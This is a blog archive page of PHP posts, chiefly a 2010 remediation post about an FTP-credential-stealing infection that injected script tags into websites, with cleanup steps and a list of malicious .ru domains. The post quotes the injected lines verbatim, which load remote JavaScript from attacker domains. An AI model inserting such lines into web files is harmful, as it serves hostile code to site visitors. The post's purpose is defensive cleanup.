Archive

Archive for the ‘PHP’ Category

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.

Categories: Malware, PHP, Randomness, Security Tags:

Use PHP to check used and free space on remote computers

November 19th, 2009 2 comments
PHP Drive Space Report

PHP Drive Space Report

Using Google Charts API, PHP, and wmic together allows you to create awesome reports of used and free hard drive space. This is a Windows only script. Check out the code below!

Categories: Google Charts, How To, PHP Tags:

PHP PC Live Screenshot Script

August 26th, 2009 No comments

Have you ever wanted to take live screenshots of a group of PCs to see what is going on? I’ve created a PHP script that teams up with a few remote control applications that does it for you!

Features include:

  • Instant screenshots of remote PCs
  • Refresh any PC’s image with 1 click
  • Shows currently logged on username
  • Searches Active Directory for user’s information and displays full name and other custom fields
  • Fully configurable and customizable
PHP SS Overview

PHP SS Overview

PHP SS Zoom View

PHP SS Zoom View

Here is a list of what you need to download:

After downloading all of the software, follow these steps:

  1. Install WampServer to the default folders and options
  2. Left click the new WampServer icon in your tray and select “Put Online”
    PHP SS 3
  3. Again, left click the new WampServer icon in your tray, choose PHP -> PHP Settings -> Uncheck “Display Errors”
    PHP SS 6
  4. Go to start, click Run…, type in “services.msc” and hit enter. Scroll all of the way down until you find “wampapache”. Double click on it to bring up the properties window.
    PHP SS 4
  5. Change the startup type to “Automatic”, then click the Log On tab. Select “This account” and enter in the credentials of a user with proper remote execution rights on the domain.
    PHP SS 5
  6. Hit OK to close the properties window, right click on the “wampapache” service and choose restart. Close the Services window
  7. Extract PsTools.zip into the C:\Windows\System32 folder. Overwrite any existing files. Run PsExec.exe and click agree on the EULA.
  8. Install IrfanView, after installing, copy the i_view32.exe executable and paste it into the system32 folder.
  9. Open up an explorer window and browse to “C:\wamp\www” and delete the index.php file.
  10. Extract the contents of the “PHPSS.zip” file into the “C:\wamp\www” folder
  11. Use your favorite text editor and open up “index.php”. Lines 10-30 are made to be easily configurable to fit your network’s structure. Make sure you change the computer naming scheme to work with yours.
  12. Start up a web browser and point to http://localhost and try it out! Comment and let me know how it goes 🙂
Categories: How To, PHP Tags: